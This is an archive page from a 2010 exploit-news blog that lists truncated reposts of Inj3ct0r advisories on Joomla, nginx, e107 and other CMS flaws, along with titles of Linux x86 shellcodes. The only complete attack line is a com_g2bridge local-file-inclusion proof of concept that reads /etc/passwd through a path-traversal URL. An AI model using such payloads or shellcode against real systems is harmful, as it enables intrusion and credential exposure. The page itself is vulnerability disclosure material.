grab our rss feed

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Home

Entries for May, 2010

Joomla com_quran SQL Injection vulnerability

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla com_quran SQL Injection vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================
Joomla com_quran SQL Injection vulnerability
============================================
[!] ===========================================================================[!]
[~] Joomla com_quran SQL Injection vulnerability
[~] Author : r3m1ck (mick.emo.boy@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us
[~] Date : 31 May, 2010
[~] location : Indonesia
[~] Software download : http://muslimonline.org/forum/index.php?automodule=downloads&req=idx&cmd=viewdetail&f_id=2
[!]===========================================================================[!]
[ Vulnerable [...]

Leave a Comment

nginx [engine x] http server <= 0.6.36 Path Draversal

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>nginx [engine x] http server <= 0.6.36 Path Draversal</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
nginx [engine x] http server <= 0.6.36 Path Draversal
=====================================================
# Exploit Title: nginx [engine x] http server <= 0.6.36 Path Draversal
# Date: 20/05/10
# Author: cp77fk4r
# Software Link: http://nginx.org/
# Version: <= [...]

Leave a Comment

WsCMS XSS / SQL Injection Vulnerability

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>WsCMS XSS / SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
WsCMS XSS / SQL Injection Vulnerability
=======================================
__ [...]

Leave a Comment

Joomla Component com_g2bridge LFI vulnerability

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_g2bridge LFI vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
Joomla Component com_g2bridge LFI vulnerability
===============================================
# Author: akatsuchi [Explore Crew] hole@hackermail.com
# Software Link: http://www.flashyourweb.com/staticpages/index.php?page=g2bridge_readme
# Platform / Tested on: CentOS release 4.8 (Final)
# category: webaps
=============================================================================================================
[*] Exploit
http://[site]//index.php?option=com_g2bridge&controller=[LFI]
[*] PoC
http://[site]//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd%00
=============================================================================================================
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-05-31]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == [...]

Leave a Comment

ES11 SQL Injection Vulnerability

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ES11 SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================
ES11 SQL Injection Vulnerability
================================
# Title: Creato Script SQL Injection Vulnerability
# Version: 2.1
# Author: Mr.P3rfekT
# Software Site: http://www.creato.biz
# Tested on Lunix
# CVE : N/A
############### Founded By HELLBOY ###############
# Dork : "Website Powered by: [...]

Leave a Comment

GR Board v1.8.6. (theme) Local File Inclusion Vulnerability

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>GR Board v1.8.6. (theme) Local File Inclusion Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================================
GR Board v1.8.6. (theme) Local File Inclusion Vulnerability
===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities
================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Persian E107 XSS Vulnerability

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Persian E107 XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================
Persian E107 XSS Vulnerability
==============================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Visitor Logger (banned.php) Remote File Include Vulnerability

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Visitor Logger (banned.php) Remote File Include Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
Visitor Logger (banned.php) Remote File Include Vulnerability
=============================================================
#-> Visitor Logger (banned.php) Remote File Include Vulnerability
#-> Date: 2010/05/31
#-> Vendor: http://www.graviton-mediatech.com
#-> Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip
#-> Googledork: n/a
#-> Discovered by bd0rk
#-> Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com
#-> Website: www.soh-crew.it.tt
#-> [...]

Leave a Comment

ZipExplorer 7.0 (.zar) DoS

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ZipExplorer 7.0 (.zar) DoS</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================
ZipExplorer 7.0 (.zar) DoS
==========================
#!/usr/bin/python
#
# Title: ZipExplorer 7.0 (.zar) DoS
# Advisory: [...]

Leave a Comment

linux/x86 sys_chmod(“/etc/passwd”,599) shellcode 39 bytes

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 sys_chmod("/etc/passwd",599) shellcode 39 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
linux/x86 sys_chmod("/etc/passwd",599) shellcode 39 bytes
=========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 sys_rmdir(“/tmp/willdeleted”) shellcode 41 bytes

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 sys_rmdir("/tmp/willdeleted") shellcode 41 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
linux/x86 sys_rmdir("/tmp/willdeleted") shellcode 41 bytes
==========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 sys_execve(“/usr/bin/lwp-download”, “evil”) shellcode 52 bytes

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 sys_execve("/usr/bin/lwp-download", "evil") shellcode 52 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================================
linux/x86 sys_execve("/usr/bin/lwp-download", "evil") shellcode 52 bytes
========================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 sys_mkdir(“/tmp/dir”,1) shellcode 38 bytes

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 sys_mkdir("/tmp/dir",1) shellcode 38 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
linux/x86 sys_mkdir("/tmp/dir",1) shellcode 38 bytes
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 sys_execve(“/bin/sh”, “-c”, “ping localhost”) 55 bytes

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 sys_execve("/bin/sh", "-c", "ping localhost") 55 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================================
linux/x86 sys_execve("/bin/sh", "-c", "ping localhost") shellcode 55 bytes
==========================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

linux/x86 sys_execve(“/bin/sh”, “-c”, “reboot”) shellcode 45 bytes

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 sys_execve("/bin/sh", "-c", "reboot") shellcode 45 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================================
linux/x86 sys_execve("/bin/sh", "-c", "reboot") shellcode 45 bytes
==================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 sys_execve(“/bin/sh”, “0″, “0″) with umask 16 (sys_umask(14))

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14))</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================================
linux/x86 sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) 45 bytes
================================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

linux/x86 cdrom ejecting shellcode 46 bytes

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 cdrom ejecting shellcode 46 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
linux/x86 cdrom ejecting shellcode 46 bytes
===========================================
/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

linux/x86 sys_sethostname(“PwNeD !!”,8) shellcode 32 bytes

May.31, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 sys_sethostname("PwNeD !!",8) shellcode 32 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
linux/x86 sys_sethostname("PwNeD !!",8) shellcode 32 bytes
==========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

« previous entries

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News